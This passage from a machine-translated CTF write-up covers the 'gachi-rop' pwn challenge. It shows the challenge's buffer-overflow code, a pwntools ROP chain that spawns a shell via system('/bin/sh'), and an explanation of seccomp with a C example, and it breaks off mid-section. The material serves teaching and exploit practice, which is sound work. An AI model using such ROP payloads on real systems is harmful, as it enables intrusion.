{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-pwn-gachi-rop-en","result":{"data":{"markdownRemark":{"id":"9a78a01c-a2a0-5056-a71c-a1696f15de92","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/ctf-pwn-gachi-rop\">original page</a>.</p>\n</blockquote>\n<p>I’m currently studying Pwn.</p>\n<p>Following the previous article <a href=\"/ctf-pwn-og-en\">A Beginner CTFer’s Pwn Crash Course 1 - FSB Basics and ROP Techniques -</a>, this time I’ll use sec4b 2024’s “gachi-rop” challenge as a theme to summarize seccomp bypass techniques and Shell Code basics as beginner Pwn techniques.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#problem-overview-gachi-rop-pwn\">Problem Overview: gachi-rop (Pwn)</a></li>\n<li>\n<p><a href=\"#seccomp-overview-and-implementation\">seccomp Overview and Implementation</a></p>\n<ul>\n<li><a href=\"#implementing-seccomp-in-strict-mode\">Implementing seccomp in Strict Mode</a></li>\n<li><a href=\"#implementing-seccomp-bpf-with-libseccomp\">Implementing seccomp-bpf with libseccomp</a></li>\n<li><a href=\"#implementing-seccomp-bpf-with-prctl\">Implementing seccomp-bpf with prctl</a></li>\n<li><a href=\"#using-seccomp-tools\">Using seccomp-tools</a></li>\n<li><a href=\"#checking-the-challenge-binarys-seccomp-filter\">Checking the Challenge Binary’s seccomp Filter</a></li>\n</ul>\n</li>\n<li>\n<p><a href=\"#bypassing-seccomp\">Bypassing seccomp</a></p>\n<ul>\n<li><a href=\"#using-alternative-system-calls\">Using Alternative System Calls</a></li>\n<li><a href=\"#abusing-ptrace\">Abusing ptrace</a></li>\n<li><a href=\"#bypass-using-32-bit-system-calls\">Bypass Using 32-bit System Calls</a></li>\n<li><a href=\"#seccomp-bypass-using-32-bit-abi\">seccomp Bypass Using 32-bit ABI</a></li>\n</ul>\n</li>\n<li><a href=\"#about-execve-and-execveat\">About execve and execveat</a></li>\n<li>\n<p><a href=\"#shell-code-introduction\">Shell Code Introduction</a></p>\n<ul>\n<li><a href=\"#creating-a-shell-code\">Creating a Shell Code</a></li>\n<li><a href=\"#executing-a-program-with-execveat\">Executing a Program with execveat</a></li>\n<li><a href=\"#reading-and-printing-file-contents-with-openreadwrite\">Reading and Printing File Contents with open/read/write</a></li>\n<li><a href=\"#browsing-directory-entries-with-getdents\">Browsing Directory Entries with getdents</a></li>\n<li><a href=\"#bypassing-nx-with-mprotect\">Bypassing NX with mprotect</a></li>\n<li><a href=\"#generating-shell-code-with-shellcraft\">Generating Shell Code with shellcraft</a></li>\n<li><a href=\"#other-shell-code-samples\">Other Shell Code Samples</a></li>\n</ul>\n</li>\n<li>\n<p><a href=\"#solution-1-output-file-data-and-retrieve-the-flag\">Solution 1: Output File Data and Retrieve the Flag</a></p>\n<ul>\n<li><a href=\"#granting-execute-permission-with-mprotect\">Granting Execute Permission with mprotect</a></li>\n<li><a href=\"#embedding-a-payload-at-an-arbitrary-address\">Embedding a Payload at an Arbitrary Address</a></li>\n<li><a href=\"#executing-the-embedded-shell-code\">Executing the Embedded Shell Code</a></li>\n</ul>\n</li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"problem-overview-gachi-rop-pwn\" style=\"position:relative;\"><a href=\"#problem-overview-gachi-rop-pwn\" aria-label=\"problem overview gachi rop pwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Problem Overview: gachi-rop (Pwn)</h2>\n<blockquote>\n<p>Bored of One Gadgets already? Welcome to the world of gachi-ROP!</p>\n</blockquote>\n<p>Reading the provided Dockerfile, we can see that <code class=\"language-text\">flag.txt</code> is placed in the <code class=\"language-text\">ctf4b</code> directory with a random MD5 hash appended to its name:</p>\n<div class=\"gatsby-highlight\" data-language=\"dockerfile\"><pre class=\"language-dockerfile\"><code class=\"language-dockerfile\"><span class=\"token instruction\"><span class=\"token keyword\">FROM</span> ubuntu:22.04@sha256:2af372c1e2645779643284c7dc38775e3dbbc417b2d784a27c5a9eb784014fb8 <span class=\"token keyword\">AS</span> base</span>\n<span class=\"token instruction\"><span class=\"token keyword\">WORKDIR</span> /app</span>\n<span class=\"token instruction\"><span class=\"token keyword\">COPY</span> gachi-rop run</span>\n<span class=\"token instruction\"><span class=\"token keyword\">COPY</span> flag.txt /flag.txt</span>\n<span class=\"token instruction\"><span class=\"token keyword\">RUN</span> mkdir ctf4b</span>\n<span class=\"token instruction\"><span class=\"token keyword\">RUN</span>  mv /flag.txt ctf4b/flag-$(md5sum /flag.txt | awk <span class=\"token string\">'{print $1}'</span>).txt</span>\n\n<span class=\"token instruction\"><span class=\"token keyword\">FROM</span> pwn.red/jail</span>\n<span class=\"token instruction\"><span class=\"token keyword\">COPY</span> <span class=\"token options\"><span class=\"token property\">--from</span><span class=\"token punctuation\">=</span><span class=\"token string\">base</span></span> / /srv</span>\n<span class=\"token instruction\"><span class=\"token keyword\">RUN</span> chmod +x /srv/app/run</span>\n<span class=\"token instruction\"><span class=\"token keyword\">ENV</span> JAIL_TIME=60 JAIL_CPU=100 JAIL_MEM=10M</span></code></pre></div>\n<p>The directory structure is as follows. Since guessing the file name is impractical, the basic strategy is either to obtain a shell via exploitation, or to identify the flag file name somehow and leak its contents.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 926px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/5ffc9e220dbe9208450b2cc4b081383a/69476/image-20240616185938530.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 35%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA4ElEQVQoz62SzXLCMAyE3SROMCEhtmOHAWJDflpo3//5trImPXKih53RaORPWsliDCPmeYJzDju1gxDiPfWuhx88FMGqqoIs5XvAx/OB2z0SrIQ2GofmgIakdccFtrcIMXDTEEeofU35j9fAeAu4jle2e76cYQjaEcx5xwUp9/m1IhJ0WWa4y4BSqdfANE23TfMv+v55Yl0X3l+y17QN2/6znNaQDjdslvdkOc9zSClJBYqi2GLJsZimO06nAVmW8eO6rllt2zIwNfLe8y9I0GN3ZEfGGK7XWsNYA2st534BtLibZgcIWWkAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/5ffc9e220dbe9208450b2cc4b081383a/8ac56/image-20240616185938530.webp 240w,\n/static/5ffc9e220dbe9208450b2cc4b081383a/d3be9/image-20240616185938530.webp 480w,\n/static/5ffc9e220dbe9208450b2cc4b081383a/dafe9/image-20240616185938530.webp 926w\"\n              sizes=\"(max-width: 926px) 100vw, 926px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/5ffc9e220dbe9208450b2cc4b081383a/8ff5a/image-20240616185938530.png 240w,\n/static/5ffc9e220dbe9208450b2cc4b081383a/e85cb/image-20240616185938530.png 480w,\n/static/5ffc9e220dbe9208450b2cc4b081383a/69476/image-20240616185938530.png 926w\"\n            sizes=\"(max-width: 926px) 100vw, 926px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/5ffc9e220dbe9208450b2cc4b081383a/69476/image-20240616185938530.png\"\n            alt=\"image-20240616185938530\"\n            title=\"image-20240616185938530\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Looking at the challenge binary, we can see that a libc function address is leaked at startup:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">int32_t main<span class=\"token punctuation\">(</span>int32_t argc, char** argv, char** envp<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n    install_seccomp<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    printf<span class=\"token punctuation\">(</span><span class=\"token string\">\"system@%p<span class=\"token entity\" title=\"\\n\">\\n</span>\"</span>, system<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    int64_t buf <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n    int64_t var_10 <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n    printf<span class=\"token punctuation\">(</span><span class=\"token string\">\"Name: \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    gets<span class=\"token punctuation\">(</span><span class=\"token operator\">&amp;</span>buf<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    printf<span class=\"token punctuation\">(</span><span class=\"token string\">\"Hello, gachi-rop-%s!!<span class=\"token entity\" title=\"\\n\">\\n</span>\"</span>, <span class=\"token operator\">&amp;</span>buf<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token builtin class-name\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>There is also an obvious BoF vulnerability, and protections such as Canary and PIE are disabled, so a ROP chain exploit should be relatively straightforward.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 798px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/4eced87434f30787a15bf39dceb80964/898f6/image-20240616185455256.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 35.416666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABQklEQVQoz4WR23KCMBRFw0xtFRG0VgJeIEiQFk3tRcT+/4ethjjtTPvQPqzZ55acTLaYLyNUI9FmSV4v0U8HyieD3h8pdg15WTuybeXydKPYVjWl3qIKhZQxYRgym03xfR8hhEfT7IkXCeFowLN+oFoFNCpkPLztB/B+If5G2E05N4MBdzaOh4IkEKw8wfT/w9eFnudwebQYUZoUWYQkqwlZskLOJXI8JZ7cM7IMJzOGwczFd37EKIgYj32iaUQQBD8XVLWmMY+8vBmOb8+8vL+i65p1UbBRiizPHZssQ22v/5arHPVFn+cZ683aIXa7itpeYMyBZt9wPBpO7TuXy5nu0tKeT5y7k9PO1c6u3/NVu3x0tF1r51pE79bB7Kkfd2hdWvdKFvGCJE2sg5LYuvityVXTZWpfnbk56foxsY373if06LNmKZMu7gAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/4eced87434f30787a15bf39dceb80964/8ac56/image-20240616185455256.webp 240w,\n/static/4eced87434f30787a15bf39dceb80964/d3be9/image-20240616185455256.webp 480w,\n/static/4eced87434f30787a15bf39dceb80964/ce206/image-20240616185455256.webp 798w\"\n              sizes=\"(max-width: 798px) 100vw, 798px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/4eced87434f30787a15bf39dceb80964/8ff5a/image-20240616185455256.png 240w,\n/static/4eced87434f30787a15bf39dceb80964/e85cb/image-20240616185455256.png 480w,\n/static/4eced87434f30787a15bf39dceb80964/898f6/image-20240616185455256.png 798w\"\n            sizes=\"(max-width: 798px) 100vw, 798px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/4eced87434f30787a15bf39dceb80964/898f6/image-20240616185455256.png\"\n            alt=\"image-20240616185455256\"\n            title=\"image-20240616185455256\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I tried sending the following typical ROP chain payload to obtain a shell:</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token comment\"># Exploit</span>\nr <span class=\"token operator\">=</span> target<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"Name: \"</span><span class=\"token punctuation\">)</span>\n\nsystem_addr <span class=\"token operator\">=</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span>r<span class=\"token punctuation\">.</span>decode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span><span class=\"token string\">\"\\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span><span class=\"token string\">\"@\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span><span class=\"token number\">16</span><span class=\"token punctuation\">)</span>\nlibc_baseaddress <span class=\"token operator\">=</span> system_addr <span class=\"token operator\">-</span> <span class=\"token number\">0x50d70</span>\nbinsh_addr <span class=\"token operator\">=</span> libc_baseaddress <span class=\"token operator\">+</span> <span class=\"token number\">0x1d8678</span>\npop_rdi_ret <span class=\"token operator\">=</span> libc_baseaddress <span class=\"token operator\">+</span> <span class=\"token number\">0x001bbea1</span>\nret <span class=\"token operator\">=</span> <span class=\"token number\">0x4012fc</span>\n\npayload <span class=\"token operator\">=</span> flat<span class=\"token punctuation\">(</span>\n    <span class=\"token string\">b\"A\"</span><span class=\"token operator\">*</span><span class=\"token number\">0x10</span> <span class=\"token operator\">+</span> <span class=\"token string\">b\"B\"</span><span class=\"token operator\">*</span><span class=\"token number\">8</span><span class=\"token punctuation\">,</span>\n    pop_rdi_ret<span class=\"token punctuation\">,</span>\n    binsh_addr<span class=\"token punctuation\">,</span>\n    ret<span class=\"token punctuation\">,</span>\n    system_addr\n<span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span></code></pre></div>\n<p>However, even though this payload successfully executes the <code class=\"language-text\">system</code> function with <code class=\"language-text\">/bin/sh</code> as the argument, it fails to obtain a shell.</p>\n<p>Capturing strace during the exploit reveals that the process terminates when the <code class=\"language-text\">execve</code> system call is issued with <code class=\"language-text\">/bin/sh</code> as the argument:</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/4f1f8f77c7e16209add8b024f7f0c3a7/22475/image-20240618205240678.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 17.916666666666668%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAvUlEQVQY042P23KCMBRFA6klHSEkIDcpOCre0Pr/f7dM4lRn+tSHPXvNSWblRMzXC5vNyG6/ZXTt2VpDVa1o2oaqrijLAq0zCtfLdEnm2M+stdRNTZal5CanKCzi537jcJyYrzOe+35N/91jnFRrTeukxpgQL/VzpZRLgvpSLD4XRFGEEOKZ0/nEftrhu+taUrdBkiThsFyV6FwHjuMY+SGRUj5ZvvmP8Mh0mNx3B4ZxCFv8Crp1Fx54Xf5HHmBHXbSyn2V3AAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/4f1f8f77c7e16209add8b024f7f0c3a7/8ac56/image-20240618205240678.webp 240w,\n/static/4f1f8f77c7e16209add8b024f7f0c3a7/d3be9/image-20240618205240678.webp 480w,\n/static/4f1f8f77c7e16209add8b024f7f0c3a7/e46b2/image-20240618205240678.webp 960w,\n/static/4f1f8f77c7e16209add8b024f7f0c3a7/525da/image-20240618205240678.webp 1039w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/4f1f8f77c7e16209add8b024f7f0c3a7/8ff5a/image-20240618205240678.png 240w,\n/static/4f1f8f77c7e16209add8b024f7f0c3a7/e85cb/image-20240618205240678.png 480w,\n/static/4f1f8f77c7e16209add8b024f7f0c3a7/d9199/image-20240618205240678.png 960w,\n/static/4f1f8f77c7e16209add8b024f7f0c3a7/22475/image-20240618205240678.png 1039w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/4f1f8f77c7e16209add8b024f7f0c3a7/d9199/image-20240618205240678.png\"\n            alt=\"image-20240618205240678\"\n            title=\"image-20240618205240678\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>This is because the process is protected by seccomp registered inside the <code class=\"language-text\">install_seccomp</code> function that runs at the start of <code class=\"language-text\">main</code>.</p>\n<p>In fact, by patching the binary to skip <code class=\"language-text\">install_seccomp</code>, the same payload successfully obtains a shell:</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/6f704a4051aea2059ca8e021df097980/4d108/image-20240618204908173.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 17.5%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAu0lEQVQY022PyQ6CQBBEhz0aEGEIRmhmwAMgiycx+v8fVg6daOJyeKnbqyrRqCP2iUS0TxEnKVJpMt5BCPEmO2TouhZd3+I89NC1wunUgKoSRIaKUJQFZCYhyijA1vPguq7B+RC9kHnGsnEaOCtFyPPcFMc8IIxCJGnCiGCzge/7sG2bsSzrR3ikArfbwsJpnjCMAy/WtYZSiuWr2DPDxL9F35AmPB53zJcZy3Llu0orc5cgpeSrazqOgyeuKWDKkPW/ogAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/6f704a4051aea2059ca8e021df097980/8ac56/image-20240618204908173.webp 240w,\n/static/6f704a4051aea2059ca8e021df097980/d3be9/image-20240618204908173.webp 480w,\n/static/6f704a4051aea2059ca8e021df097980/e46b2/image-20240618204908173.webp 960w,\n/static/6f704a4051aea2059ca8e021df097980/f992d/image-20240618204908173.webp 1440w,\n/static/6f704a4051aea2059ca8e021df097980/882b9/image-20240618204908173.webp 1920w,\n/static/6f704a4051aea2059ca8e021df097980/3729c/image-20240618204908173.webp 2099w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/6f704a4051aea2059ca8e021df097980/8ff5a/image-20240618204908173.png 240w,\n/static/6f704a4051aea2059ca8e021df097980/e85cb/image-20240618204908173.png 480w,\n/static/6f704a4051aea2059ca8e021df097980/d9199/image-20240618204908173.png 960w,\n/static/6f704a4051aea2059ca8e021df097980/07a9c/image-20240618204908173.png 1440w,\n/static/6f704a4051aea2059ca8e021df097980/29114/image-20240618204908173.png 1920w,\n/static/6f704a4051aea2059ca8e021df097980/4d108/image-20240618204908173.png 2099w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/6f704a4051aea2059ca8e021df097980/d9199/image-20240618204908173.png\"\n            alt=\"image-20240618204908173\"\n            title=\"image-20240618204908173\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>From the above, the basic strategy for this challenge is to either lift the seccomp restriction or build a ROP chain that retrieves the Flag within the allowed system call set.</p>\n<h2 id=\"seccomp-overview-and-implementation\" style=\"position:relative;\"><a href=\"#seccomp-overview-and-implementation\" aria-label=\"seccomp overview and implementation permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>seccomp Overview and Implementation</h2>\n<p>seccomp (secure computing mode) is a protection mechanism that can restrict the system calls a process issues.</p>\n<p>When a process enables seccomp protection on itself, any system call that is not permitted will cause the process to terminate.</p>\n<p>seccomp was first introduced in Linux kernel 2.6.12; since Linux kernel 3.5, the more flexible seccomp-bpf has been added.</p>\n<p>The original seccomp is called Strict mode: it only allowed <code class=\"language-text\">read</code>, <code class=\"language-text\">write</code> on already-opened file descriptors, and <code class=\"language-text\">exit</code> and <code class=\"language-text\">sigreturn</code> — four system calls in total — blocking all others.</p>\n<p>The more flexible seccomp-bpf monitors executed system calls using a filter expressed as a Berkeley Packet Filter (BPF) program.</p>\n<p>Reference: <a href=\"https://www.kernel.org/doc/html/v4.19/userspace-api/seccomp_filter.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Seccomp BPF (Secure Computing with Filters) — The Linux Kernel documentation</a></p>\n<h3 id=\"implementing-seccomp-in-strict-mode\" style=\"position:relative;\"><a href=\"#implementing-seccomp-in-strict-mode\" aria-label=\"implementing seccomp in strict mode permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Implementing seccomp in Strict Mode</h3>\n<p>Let’s confirm that <code class=\"language-text\">execve</code> fails when Strict mode seccomp is enabled with <code class=\"language-text\">prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT);</code>:</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;fcntl.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdio.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;unistd.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;string.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;linux/seccomp.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;sys/prctl.h></span></span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n    <span class=\"token macro property\"><span class=\"token directive-hash\">#</span> <span class=\"token directive keyword\">prctl</span><span class=\"token expression\"><span class=\"token punctuation\">(</span>PR_SET_SECCOMP<span class=\"token operator\">=</span><span class=\"token number\">0x16</span><span class=\"token punctuation\">,</span>SECCOMP_MODE_STRICT<span class=\"token operator\">=</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span></span></span>\n    <span class=\"token function\">prctl</span><span class=\"token punctuation\">(</span>PR_SET_SECCOMP<span class=\"token punctuation\">,</span> SECCOMP_MODE_STRICT<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>args <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span> <span class=\"token string\">\"/bin/echo\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"After enable seccomp.\"</span> <span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">}</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">execve</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"/bin/echo\"</span><span class=\"token punctuation\">,</span>args<span class=\"token punctuation\">,</span><span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>Reference: <a href=\"https://docs.huihoo.com/doxygen/linux/kernel/3.7/include_2uapi_2linux_2seccomp_8h.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Linux Kernel: include/uapi/linux/seccomp.h File Reference</a></p>\n<p>Reference: <a href=\"https://github.com/spotify/linux/blob/master/include/linux/prctl.h\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">linux/include/linux/prctl.h at master · spotify/linux</a></p>\n<p>Compiling and running this code confirms that the process is killed by SIGKILL when it tries to execute the <code class=\"language-text\">execve</code> system call:</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/0ee175e14f41725ecf75677f3f330566/a3767/image-20240618230141319.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 70%; position: relative; bottom: 0; left: 0; background-image: 